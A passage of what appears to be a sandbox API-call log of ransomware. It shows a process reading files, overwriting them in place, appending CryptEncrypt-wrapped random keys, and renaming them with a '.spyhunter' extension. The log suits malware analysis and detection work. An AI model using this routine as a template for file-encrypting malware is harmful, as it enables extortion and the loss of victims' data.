dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.459] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat") returned 59 [0127.459] StrStrW (lpFirst="Yakutat", lpSrch=".txt") returned 0x0 [0127.459] GetProcessHeap () returned 0x2c0000 [0127.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.460] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f48c*=0x4c4, lpOverlapped=0x0) returned 1 [0127.471] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffb3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.472] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4c4, lpNumberOfBytesWritten=0x270f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f48c*=0x4c4, lpOverlapped=0x0) returned 1 [0127.472] GetProcessHeap () returned 0x2c0000 [0127.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.472] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.472] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f48c, lpOverlapped=0x0 | out: lpBuffer=0x270f4cc*, lpNumberOfBytesWritten=0x270f48c*=0x4, lpOverlapped=0x0) returned 1 [0127.472] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f48c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f48c*=0x30, lpOverlapped=0x0) returned 1 [0127.472] CloseHandle (hObject=0xf4) returned 1 [0127.472] GetProcessHeap () returned 0x2c0000 [0127.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.472] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat.spyhunter") returned 69 [0127.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat.spyhunter")) returned 1 [0127.473] GetProcessHeap () returned 0x2c0000 [0127.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.473] GetProcessHeap () returned 0x2c0000 [0127.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.473] GetProcessHeap () returned 0x2c0000 [0127.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9b80 | out: hHeap=0x2c0000) returned 1 [0127.474] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4d0 | out: pbBuffer=0x270f4d0) returned 1 [0127.474] GetProcessHeap () returned 0x2c0000 [0127.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.474] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4c8*=0x30) returned 1 [0127.474] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.474] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver") returned 61 [0127.474] StrStrW (lpFirst="Vancouver", lpSrch=".txt") returned 0x0 [0127.474] GetProcessHeap () returned 0x2c0000 [0127.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.475] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f48c*=0x638, lpOverlapped=0x0) returned 1 [0127.491] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffff9c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.491] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x638, lpNumberOfBytesWritten=0x270f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f48c*=0x638, lpOverlapped=0x0) returned 1 [0127.491] GetProcessHeap () returned 0x2c0000 [0127.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.491] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.491] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f48c, lpOverlapped=0x0 | out: lpBuffer=0x270f4cc*, lpNumberOfBytesWritten=0x270f48c*=0x4, lpOverlapped=0x0) returned 1 [0127.491] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f48c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f48c*=0x30, lpOverlapped=0x0) returned 1 [0127.492] CloseHandle (hObject=0xf4) returned 1 [0127.492] GetProcessHeap () returned 0x2c0000 [0127.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.492] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver.spyhunter") returned 71 [0127.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver.spyhunter")) returned 1 [0127.493] GetProcessHeap () returned 0x2c0000 [0127.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.493] GetProcessHeap () returned 0x2c0000 [0127.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.493] GetProcessHeap () returned 0x2c0000 [0127.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba688 | out: hHeap=0x2c0000) returned 1 [0127.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4c8 | out: pbBuffer=0x270f4c8) returned 1 [0127.493] GetProcessHeap () returned 0x2c0000 [0127.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4c0*=0x30) returned 1 [0127.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.494] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay") returned 63 [0127.495] StrStrW (lpFirst="Thunder_Bay", lpSrch=".txt") returned 0x0 [0127.495] GetProcessHeap () returned 0x2c0000 [0127.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.495] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f484*=0x4a4, lpOverlapped=0x0) returned 1 [0127.668] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffb5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.668] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4a4, lpNumberOfBytesWritten=0x270f484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f484*=0x4a4, lpOverlapped=0x0) returned 1 [0127.668] GetProcessHeap () returned 0x2c0000 [0127.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.668] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.668] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f484, lpOverlapped=0x0 | out: lpBuffer=0x270f4c4*, lpNumberOfBytesWritten=0x270f484*=0x4, lpOverlapped=0x0) returned 1 [0127.668] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f484, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f484*=0x30, lpOverlapped=0x0) returned 1 [0127.669] CloseHandle (hObject=0xf4) returned 1 [0127.669] GetProcessHeap () returned 0x2c0000 [0127.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.669] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay.spyhunter") returned 73 [0127.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay.spyhunter")) returned 1 [0127.670] GetProcessHeap () returned 0x2c0000 [0127.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.670] GetProcessHeap () returned 0x2c0000 [0127.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.670] GetProcessHeap () returned 0x2c0000 [0127.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba5c0 | out: hHeap=0x2c0000) returned 1 [0127.670] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4c8 | out: pbBuffer=0x270f4c8) returned 1 [0127.670] GetProcessHeap () returned 0x2c0000 [0127.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.670] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4c0*=0x30) returned 1 [0127.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.899] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg") returned 62 [0127.899] StrStrW (lpFirst="Yekaterinburg", lpSrch=".txt") returned 0x0 [0127.899] GetProcessHeap () returned 0x2c0000 [0127.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.899] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f484, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f484*=0x245, lpOverlapped=0x0) returned 1 [0127.900] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.900] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x270f484, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f484*=0x245, lpOverlapped=0x0) returned 1 [0127.900] GetProcessHeap () returned 0x2c0000 [0127.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.900] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.900] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f484, lpOverlapped=0x0 | out: lpBuffer=0x270f4c4*, lpNumberOfBytesWritten=0x270f484*=0x4, lpOverlapped=0x0) returned 1 [0127.900] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f484, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f484*=0x30, lpOverlapped=0x0) returned 1 [0127.900] CloseHandle (hObject=0xf4) returned 1 [0127.917] GetProcessHeap () returned 0x2c0000 [0127.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.917] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg.spyhunter") returned 72 [0127.917] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg.spyhunter")) returned 1 [0127.918] GetProcessHeap () returned 0x2c0000 [0127.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.918] GetProcessHeap () returned 0x2c0000 [0127.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.918] GetProcessHeap () returned 0x2c0000 [0127.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb240 | out: hHeap=0x2c0000) returned 1 [0127.918] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4c0 | out: pbBuffer=0x270f4c0) returned 1 [0127.918] GetProcessHeap () returned 0x2c0000 [0127.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.918] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4b8*=0x30) returned 1 [0127.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.919] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye") returned 61 [0127.919] StrStrW (lpFirst="Zaporozhye", lpSrch=".txt") returned 0x0 [0127.919] GetProcessHeap () returned 0x2c0000 [0127.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0127.919] ReadFile (in: hFile=0xf4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f47c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f47c*=0x430, lpOverlapped=0x0) returned 1 [0127.948] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffbd0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.948] WriteFile (in: hFile=0xf4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x270f47c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f47c*=0x430, lpOverlapped=0x0) returned 1 [0127.948] GetProcessHeap () returned 0x2c0000 [0127.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0127.948] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.955] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f47c, lpOverlapped=0x0 | out: lpBuffer=0x270f4bc*, lpNumberOfBytesWritten=0x270f47c*=0x4, lpOverlapped=0x0) returned 1 [0127.956] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f47c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f47c*=0x30, lpOverlapped=0x0) returned 1 [0127.956] CloseHandle (hObject=0xf4) returned 1 [0127.956] GetProcessHeap () returned 0x2c0000 [0127.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.956] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye.spyhunter") returned 71 [0127.956] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye.spyhunter")) returned 1 [0127.957] GetProcessHeap () returned 0x2c0000 [0127.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.957] GetProcessHeap () returned 0x2c0000 [0127.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.957] GetProcessHeap () returned 0x2c0000 [0127.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc438 | out: hHeap=0x2c0000) returned 1 [0127.957] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4c0 | out: pbBuffer=0x270f4c0) returned 1 [0127.957] GetProcessHeap () returned 0x2c0000 [0127.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.957] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4b8*=0x30) returned 1 [0127.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.958] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw") returned 57 [0127.958] StrStrW (lpFirst="Warsaw", lpSrch=".txt") returned 0x0 [0127.958] GetProcessHeap () returned 0x2c0000 [0127.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0127.958] ReadFile (in: hFile=0xf4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f47c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f47c*=0x588, lpOverlapped=0x0) returned 1 [0128.127] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffa78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.127] WriteFile (in: hFile=0xf4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x588, lpNumberOfBytesWritten=0x270f47c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f47c*=0x588, lpOverlapped=0x0) returned 1 [0128.311] GetProcessHeap () returned 0x2c0000 [0128.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0128.311] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.311] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f47c, lpOverlapped=0x0 | out: lpBuffer=0x270f4bc*, lpNumberOfBytesWritten=0x270f47c*=0x4, lpOverlapped=0x0) returned 1 [0128.311] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f47c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f47c*=0x30, lpOverlapped=0x0) returned 1 [0128.311] CloseHandle (hObject=0xf4) returned 1 [0128.311] GetProcessHeap () returned 0x2c0000 [0128.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0128.311] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw.spyhunter") returned 67 [0128.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw.spyhunter")) returned 1 [0128.312] GetProcessHeap () returned 0x2c0000 [0128.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0128.312] GetProcessHeap () returned 0x2c0000 [0128.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0128.312] GetProcessHeap () returned 0x2c0000 [0128.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2e00 | out: hHeap=0x2c0000) returned 1 [0128.312] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4b8 | out: pbBuffer=0x270f4b8) returned 1 [0128.312] GetProcessHeap () returned 0x2c0000 [0128.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0128.312] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4b0*=0x30) returned 1 [0128.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\vviewer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0128.775] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL") returned 64 [0128.775] StrStrW (lpFirst="VVIEWER.DLL", lpSrch=".txt") returned 0x0 [0128.775] GetProcessHeap () returned 0x2c0000 [0128.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0128.775] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f474, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f474*=0x2800, lpOverlapped=0x0) returned 1 [0128.776] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.777] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f474, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f474*=0x2800, lpOverlapped=0x0) returned 1 [0128.777] GetProcessHeap () returned 0x2c0000 [0128.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0128.777] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.777] WriteFile (in: hFile=0x170, lpBuffer=0x270f4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f474, lpOverlapped=0x0 | out: lpBuffer=0x270f4b4*, lpNumberOfBytesWritten=0x270f474*=0x4, lpOverlapped=0x0) returned 1 [0128.778] WriteFile (in: hFile=0x170, 